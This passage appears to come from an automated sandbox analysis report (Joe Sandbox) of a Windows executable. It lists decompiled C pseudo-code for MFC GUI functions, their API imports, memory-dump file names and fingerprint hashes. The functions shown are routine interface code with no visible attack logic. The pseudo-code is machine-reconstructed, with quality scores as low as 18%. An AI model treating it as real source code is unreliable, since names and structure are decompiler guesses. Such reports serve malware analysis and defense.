					lstrcpyA( &_v220, _a12);
					_v156 = _a20;
					_v640.uID = _a8;
					lstrcpynA( &_v480, _a16, 0x100);
					_v224 = 0x61a8;
					return Shell_NotifyIconA(1,  &_v640);
				}
				return _t23;
			}

0x00428efa
0x00428f05
0x00428f12
0x00428f33
0x00428f3e
0x00428f4d
0x00428f57
0x00428f62
0x00428f73
0x00428f7c
0x00428f89
0x00428f95
0x00000000
0x00428fa2
0x00428fa9

APIs

GetVersionExA.KERNEL32(?), ref: 00428F05
memset.MSVCRT ref: 00428F33
lstrcpyA.KERNEL32(?,?), ref: 00428F62
lstrcpynA.KERNEL32(?,?,00000100), ref: 00428F89
Shell_NotifyIconA.SHELL32(00000001,000001E8), ref: 00428FA2

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: IconNotifyShell_Versionlstrcpylstrcpynmemset
String ID:
API String ID: 1460148752-0
Opcode ID: f16d3d705827ca840b0987156a625c11a61141ed72b04443a3149f54354d7591
Instruction ID: fd571d6783c02558b4a0538d330973a157ad3ba4aeb0828cb2ae7e93ed09fba3
Opcode Fuzzy Hash: f16d3d705827ca840b0987156a625c11a61141ed72b04443a3149f54354d7591
Instruction Fuzzy Hash: 4A11E87490525D9FDF20DF70DD4EBCDBBB8AF09309F0041D6A90CA6291D7749A988F54

Uniqueness

Uniqueness Score: -1.00%

Function 004100B0, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004100B0(intOrPtr __ecx) {
				intOrPtr* _t37;
				void* _t42;

				E0043E4E0(0x440491, _t42);
				_push(__ecx);
				_t37 =  *((intOrPtr*)(_t42 + 8));
				 *((intOrPtr*)(_t42 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) =  *_t37;
				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t37 + 4));
				_push(_t37 + 8);
				L0043DD3C();
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				_push(_t37 + 0xc);
				L0043DD3C();
				_push(_t37 + 0x10);
				 *(_t42 - 4) = 1;
				L0043DD3C();
				_push(_t37 + 0x14);
				 *(_t42 - 4) = 2;
				L0043DD3C();
				 *((intOrPtr*)(__ecx + 0x18)) =  *((intOrPtr*)(_t37 + 0x18));
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return __ecx;
			}

0x004100b5
0x004100ba
0x004100bd
0x004100c2
0x004100ca
0x004100cf
0x004100d5
0x004100d6
0x004100db
0x004100e2
0x004100e6
0x004100f1
0x004100f2
0x004100f6
0x00410101
0x00410102
0x00410106
0x00410111
0x00410118
0x00410120

APIs

__EH_prolog.LIBCMT ref: 004100B5
#535.MFC42(?,?,?,?,0040FFD8,00000000), ref: 004100D6
#535.MFC42(?,?,?,?,?,0040FFD8,00000000), ref: 004100E6
#535.MFC42(?,?,?,?,?,?,0040FFD8,00000000), ref: 004100F6
#535.MFC42(?,?,?,?,?,?,?,0040FFD8,00000000), ref: 00410106

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #535$H_prolog
String ID:
API String ID: 3656073097-0
Opcode ID: 328fb0151820b0e9066c120224fc1e02d12cffe3875250715e9f7c73de0e61ba
Instruction ID: fcbdd0bd631b91396e00796e33d1daeececc5d6dc286f47a461feb27ecf99cd6
Opcode Fuzzy Hash: 328fb0151820b0e9066c120224fc1e02d12cffe3875250715e9f7c73de0e61ba
Instruction Fuzzy Hash: 4F014C72A00606AFC710DF59D440A9AF7F8FF18314F008A2FA05AC3641D778FA48CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041BFC6, Relevance: 7.5, APIs: 5, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0041BFC6(intOrPtr* __ecx) {
				void* __esi;
				void* _t18;
				void* _t19;
				intOrPtr* _t34;
				void* _t36;

				E0043E4E0(0x441613, _t36);
				_push(__ecx);
				_push( *((intOrPtr*)(_t36 + 8)));
				_t34 = __ecx;
				 *((intOrPtr*)(_t36 - 0x10)) = __ecx;
				_push(0xab);
				L0043E054();
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				_t18 = E0040E07A(__ecx + 0x60);
				 *(_t36 - 4) = 1;
				L0043DDD8();
				 *(_t36 - 4) = 2;
				L0043DDD8();
				 *(_t36 - 4) = 3;
				_t19 = L00404F04(_t18, __ecx + 0xd8, __ecx);
				 *(_t36 - 4) = 4;
				L00404F04(_t19, _t34 + 0x12c, _t34);
				_push(0x4550cc);
				 *(_t36 - 4) = 5;
				 *_t34 = 0x448560;
				L0043DDD2();
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}

0x0041bfcb
0x0041bfd0
0x0041bfd3
0x0041bfd6
0x0041bfd8
0x0041bfdb
0x0041bfe0
0x0041bfe5
0x0041bfec
0x0041bff7
0x0041bffb
0x0041c006
0x0041c00c
0x0041c017
0x0041c01b
0x0041c026
0x0041c02a
0x0041c02f
0x0041c036
0x0041c03a
0x0041c040
0x0041c04c
0x0041c054

APIs

__EH_prolog.LIBCMT ref: 0041BFCB
#324.MFC42(000000AB,?), ref: 0041BFE0

Part of subcall function 0040E07A: __EH_prolog.LIBCMT ref: 0040E07F
Part of subcall function 0040E07A: #567.MFC42(?,?,0040D2FA), ref: 0040E08B
Part of subcall function 0040E07A: #540.MFC42(?,?,0040D2FA), ref: 0040E09D
Part of subcall function 0040E07A: #540.MFC42 ref: 0040E0C7
Part of subcall function 0040E07A: GetSysColor.USER32(0000000F), ref: 0040E0D4

#540.MFC42(000000AB,?), ref: 0041BFFB
#540.MFC42(000000AB,?), ref: 0041C00C
#860.MFC42(004550CC), ref: 0041C040

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #540$H_prolog$#324#567#860Color
String ID:
API String ID: 481706643-0
Opcode ID: 478f0ffa66c878ada9f358f2c3903f9512d8b644e57217629787ea91e1285442
Instruction ID: 35b1751f940c5f2095f2a3774c6b2aa1559b3d991bee5715f9affc5d5d638404
Opcode Fuzzy Hash: 478f0ffa66c878ada9f358f2c3903f9512d8b644e57217629787ea91e1285442
Instruction Fuzzy Hash: 9B018470A01244DEDB15EBA6C5057DEFBB0AFA5318F00445FE696632C2CBB81608C76A

Uniqueness

Uniqueness Score: -1.00%

Function 0041F2DA, Relevance: 7.5, APIs: 5, Instructions: 33
windowCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0041F2DA(void* __ecx) {
				void* __esi;
				void* _t3;
				void* _t4;
				long _t5;
				void* _t7;
				void* _t13;
				void* _t14;
				int _t16;

				_t13 = __ecx;
				L0043DF94();
				_t4 = L004044C9(_t3, __ecx, _t14);
				_push(0x43b);
				_t16 = _t4 + 0x6c;
				L0043E066();
				if(_t16 != 0) {
					_t16 =  *(_t16 + 4);
				}
				_t5 = SendMessageA( *(_t4 + 0x20), 0x30, _t16, 1);
				_push(1);
				_push(0x47d);
				L0043DF82();
				_push(1);
				_push(0x487);
				L0043DF82();
				E0041F337(_t5, _t13);
				_t7 = 1;
				return _t7;
			}

0x0041f2dc
0x0041f2de
0x0041f2e3
0x0041f2ea
0x0041f2f1
0x0041f2f4
0x0041f2fb
0x0041f2fd
0x0041f2fd
0x0041f308
0x0041f30e
0x0041f310
0x0041f317
0x0041f31c
0x0041f31e
0x0041f325
0x0041f32c
0x0041f333
0x0041f336

APIs

#4710.MFC42 ref: 0041F2DE
#3092.MFC42(0000043B), ref: 0041F2F4
SendMessageA.USER32(?,00000030,-0000006C,00000001), ref: 0041F308
#1779.MFC42(0000047D,00000001), ref: 0041F317
#1779.MFC42(00000487,00000001,0000047D,00000001), ref: 0041F325

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #1779$#3092#4710MessageSend
String ID:
API String ID: 292299062-0
Opcode ID: 70e4a4adccebd6547ae799c451a248c2afe3d9dd530d97ab78144533cd5bd842
Instruction ID: 7c94c86f7eb621372b1377927aa9f10239edbfc26c5faeb636d77ff37fa737eb
Opcode Fuzzy Hash: 70e4a4adccebd6547ae799c451a248c2afe3d9dd530d97ab78144533cd5bd842
Instruction Fuzzy Hash: EEE0EDB2B5122027E83533626C93FBE05138FC4B18F0A002BFB062F2D1CED99D424289

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0A5, Relevance: 7.5, APIs: 5, Instructions: 32
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E0041A0A5(void* __ecx) {
				int _t5;
				void* _t12;

				_t12 = __ecx;
				_push(1);
				L0043E08A();
				_t5 = strcmp( *(__ecx + 0xdc),  *(__ecx + 0x64));
				if(_t5 == 0) {
					_t5 = strcmp( *(_t12 + 0xd8),  *(_t12 + 0xe0));
					if(_t5 == 0) {
						L0043E03C();
						return _t5;
					} else {
						_push(0xffffffff);
						_push(0x10);
						_push(0xe068);
						goto L4;
					}
				} else {
					_push(0xffffffff);
					_push(0x10);
					_push(0xe067);
					L4:
					L0043E2CA();
					return _t5;
				}
			}

0x0041a0a6
0x0041a0a8
0x0041a0aa
0x0041a0b8
0x0041a0c1
0x0041a0da
0x0041a0e3
0x0041a0f7
0x0041a0fd
0x0041a0e5
0x0041a0e5
0x0041a0e7
0x0041a0e9
0x00000000
0x0041a0e9
0x0041a0c3
0x0041a0c3
0x0041a0c5
0x0041a0c7
0x0041a0ee
0x0041a0ee
0x0041a0f4
0x0041a0f4

APIs

#6334.MFC42(00000001), ref: 0041A0AA
strcmp.MSVCRT ref: 0041A0B8
strcmp.MSVCRT ref: 0041A0DA
#1199.MFC42(0000E068,00000010,000000FF,00000001), ref: 0041A0EE
#4853.MFC42(00000001), ref: 0041A0F7

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: strcmp$#1199#4853#6334
String ID:
API String ID: 3365883101-0
Opcode ID: ab57daf36217411fd670f391281d99e2630dbeb7d7e6342d3e923b385cdc56f3
Instruction ID: 0cbf19dd84620dd64f4d96e116e9476608f520a026216bf769175bfb154605c8
Opcode Fuzzy Hash: ab57daf36217411fd670f391281d99e2630dbeb7d7e6342d3e923b385cdc56f3
Instruction Fuzzy Hash: 48E09B3124671269EA3826A7FC03FDE26515F0C734F24460FF165755E19DC51CE1515D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D567, Relevance: 7.5, APIs: 5, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E0040D567(void* __ecx, intOrPtr _a4) {
				void* _t9;
				intOrPtr _t11;

				_t11 = _a4;
				_push(__ecx + 0x60);
				_push(0x429);
				_push(_t11);
				L0043DF7C();
				_push(__ecx + 0x174);
				_push(0x428);
				_push(_t11);
				L0043DF7C();
				_push(__ecx + 0x288);
				_push(0x5361);
				_push(_t11);
				L0043DF7C();
				_t9 = __ecx + 0x434;
				_push(_t9);
				_push(0x535f);
				_push(_t11);
				L0043DF7C();
				_push(__ecx + 0x3c4);
				_push(0x5360);
				_push(_t11);
				L0043DF7C();
				return _t9;
			}

0x0040d56b
0x0040d572
0x0040d573
0x0040d578
0x0040d579
0x0040d584
0x0040d585
0x0040d58a
0x0040d58b
0x0040d596
0x0040d597
0x0040d59c
0x0040d59d
0x0040d5a2
0x0040d5a8
0x0040d5a9
0x0040d5ae
0x0040d5af
0x0040d5ba
0x0040d5bb
0x0040d5c0
0x0040d5c1
0x0040d5c8

APIs

#2302.MFC42(?,00000429,?), ref: 0040D579
#2302.MFC42(?,00000428,?,?,00000429,?), ref: 0040D58B
#2302.MFC42(?,00005361,?,?,00000428,?,?,00000429,?), ref: 0040D59D
#2302.MFC42(?,0000535F,?,?,00005361,?,?,00000428,?,?,00000429,?), ref: 0040D5AF
#2302.MFC42(?,00005360,?,?,0000535F,?,?,00005361,?,?,00000428,?,?,00000429,?), ref: 0040D5C1

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2302
String ID:
API String ID: 735948377-0
Opcode ID: d07e4eec7fae75a0b86c9c2bbb2f0707b385985b235daf9cdc7132c76b0545fc
Instruction ID: cc6e1eb8ec5c7f8ec581e0b152e1a4ef95de4e2a510ad9941e823d21f38d845d
Opcode Fuzzy Hash: d07e4eec7fae75a0b86c9c2bbb2f0707b385985b235daf9cdc7132c76b0545fc
Instruction Fuzzy Hash: 78F06CF25419043BE211A111ACC2DFBA3ACDB8DB54F44541FB74595091D7E8790587B5

Uniqueness

Uniqueness Score: -1.00%

Function 00419607, Relevance: 7.5, APIs: 5, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E00419607(void* __ecx, intOrPtr _a4) {
				void* _t9;
				intOrPtr _t11;

				_t11 = _a4;
				_push(__ecx + 0x178);
				_push(0x421);
				_push(_t11);
				L0043E060();
				_push(__ecx + 0x17c);
				_push(0x422);
				_push(_t11);
				L0043E060();
				_push(__ecx + 0x180);
				_push(0x423);
				_push(_t11);
				L0043E060();
				_t9 = __ecx + 0x108;
				_push(_t9);
				_push(0x5360);
				_push(_t11);
				L0043DF7C();
				_push(__ecx + 0x184);
				_push(0x424);
				_push(_t11);
				L0043E060();
				return _t9;
			}

0x0041960b
0x00419615
0x00419616
0x0041961b
0x0041961c
0x00419627
0x00419628
0x0041962d
0x0041962e
0x00419639
0x0041963a
0x0041963f
0x00419640
0x00419645
0x0041964b
0x0041964c
0x00419651
0x00419652
0x0041965d
0x0041965e
0x00419663
0x00419664
0x0041966b

APIs

#2301.MFC42(?,00000421,?), ref: 0041961C
#2301.MFC42(?,00000422,?,?,00000421,?), ref: 0041962E
#2301.MFC42(?,00000423,?,?,00000422,?,?,00000421,?), ref: 00419640
#2302.MFC42(?,00005360,?,?,00000423,?,?,00000422,?,?,00000421,?), ref: 00419652
#2301.MFC42(?,00000424,?,?,00005360,?,?,00000423,?,?,00000422,?,?,00000421,?), ref: 00419664

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2301$#2302
String ID:
API String ID: 4116190679-0
Opcode ID: 33eb0ddf66b3c8ede4c9cfb6a11646df1022d36fd4d6931750a9d1accd2da21a
Instruction ID: 9683153a0dbcd9614c82a850ff524cf1c26ec1a8d65116a920ac6d3c3b0717c7
Opcode Fuzzy Hash: 33eb0ddf66b3c8ede4c9cfb6a11646df1022d36fd4d6931750a9d1accd2da21a
Instruction Fuzzy Hash: F5F06CB22415187DF125A522CC82FFB52BCDB9DB14F80881FB754A50C1DBE869454679

Uniqueness

Uniqueness Score: -1.00%

Function 0041AD8D, Relevance: 7.5, APIs: 5, Instructions: 26
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041AD8D(struct HWND__* _a4) {
				int _t2;
				struct HWND__* _t6;

				_t6 = _a4;
				_t2 = GetDlgCtrlID(_t6);
				if(_t2 == 0xd6da || _t2 == 0xd6db || _t2 == 0xd6dc || _t2 == 0xd6dd) {
					_t2 = GetWindowTextLengthA(_t6);
					if(_t2 >= 4) {
						return SetFocus(GetNextDlgTabItem(GetParent(_t6), _t6, 0));
					}
				}
				return _t2;
			}

0x0041ad8e
0x0041ad93
0x0041ad9e
0x0041adb6
0x0041adbf
0x00000000
0x0041add3
0x0041adbf
0x0041adda

APIs

GetDlgCtrlID.USER32(?), ref: 0041AD93
GetWindowTextLengthA.USER32(?), ref: 0041ADB6
GetParent.USER32(?), ref: 0041ADC5
GetNextDlgTabItem.USER32 ref: 0041ADCC
SetFocus.USER32(00000000), ref: 0041ADD3

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: CtrlFocusItemLengthNextParentTextWindow
String ID:
API String ID: 3675597510-0
Opcode ID: 024e9b85bd7583c0e32bdab13838abb9056b8b76b3db7362e221bc6f8bbaa228
Instruction ID: 2711c6cc8565d3d297ed7496bcb5e88ac813f6f566d669ca9248150f8e652afe
Opcode Fuzzy Hash: 024e9b85bd7583c0e32bdab13838abb9056b8b76b3db7362e221bc6f8bbaa228
Instruction Fuzzy Hash: FCE092785038106BDA2017B4BC0C6CF366BEB8B312F100423F006D18A4CB2D88C056AF

Uniqueness

Uniqueness Score: -1.00%

Function 0041BEC8, Relevance: 7.5, APIs: 5, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0041BEC8(signed int __eax, void* __ecx) {
				void* _t10;

				_push(0x473);
				L0043DFA6();
				asm("sbb esi, esi");
				_t10 =  ~__eax + 1;
				_push(_t10);
				_push(0x497);
				L0043E066();
				L0043E07E();
				_push(_t10);
				_push(0x496);
				L0043E066();
				L0043E07E();
				return __eax;
			}

0x0041becc
0x0041bed1
0x0041bedc
0x0041bede
0x0041bedf
0x0041bee0
0x0041bee5
0x0041beec
0x0041bef1
0x0041bef2
0x0041bef9
0x0041bf00
0x0041bf07

APIs

#4055.MFC42(00000473,?,?,0041BC87,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470,?,0000046F), ref: 0041BED1
#3092.MFC42(00000497,00000001,00000473,?,?,0041BC87,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470), ref: 0041BEE5
